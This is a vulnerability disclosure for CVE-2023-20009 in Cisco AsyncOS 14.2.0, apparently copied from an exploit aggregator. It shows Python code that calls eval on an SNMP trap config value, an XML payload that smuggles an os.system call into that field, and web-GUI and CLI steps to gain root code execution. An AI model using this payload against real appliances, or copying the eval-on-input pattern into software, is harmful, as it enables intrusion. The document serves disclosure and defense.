Share
## https://sploitus.com/exploit?id=PACKETSTORM:225298
# About
    
    Security researcher: ly1g3, ly1g3[at]tuta.io 
    
    GPG fingerprint: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
    
    Overview: Remote Code Execution - RCE from config file
    
    CVE: CVE-2023-20009
    
    Timeline:
    * Discovered - ly1g3
    * Reported - ly1g3
    * Fixed - Cisco
    
    # Cisco AsyncOS 14.2.0
    ESA (Cisco Secure Email) and Cisco Secure Email and Web Manager
    
    ## Privilege escalation - root shell
    A authenticated user with permissions to SNMP-config can execute arbitrary code as root using a specially crafted SNMP trap config.
    
    ## Technical
    Code exploited `ui_checker.py`:
    ```python
    def validate_trap_configuration(base, value_dict):
        validators = eval('read_var_auto_level_wrapper("snmp.%s_traps.configuration_class", non_editable_var=True)' % (base,))
        for k, v in value_dict.iteritems():
            if validators.has_key(k):
                base, conf_class_str = validators[k].rsplit('.', 1)
                module = __import__(base, fromlist=[conf_class_str])
                conf_class = eval('module.%s("%s")' % (conf_class_str, v))
            else:
                raise FilterError('validate_%s_trap_configuration_value' % (base,),
                                  _("Trap does not allow configuration"), k)
        return value_dict
    ```
    `v` will be contain the value of `common_trap.common_configuration`
    
    ```xml
    <common_trap>
        <common_name>connectivityFailure</common_name>
        <common_enabled>0</common_enabled>
        <common_configuration>http://asd.asd."+os.system("touch test.txt"))#,5</common_configuration>
        </common_trap>
    <common_trap>
    ```
    
    ### Steps to trigger using WEB-GUI:
    1. `https://192.168.1.10/system_administration/configuration_file`
    2. "Load a configuration file from local computer"
    3. Replace current `connectivityFailure` field with payload above
    
    ### Steps to trigger using CLI
    1. `loadconfig`
    2. Paste payload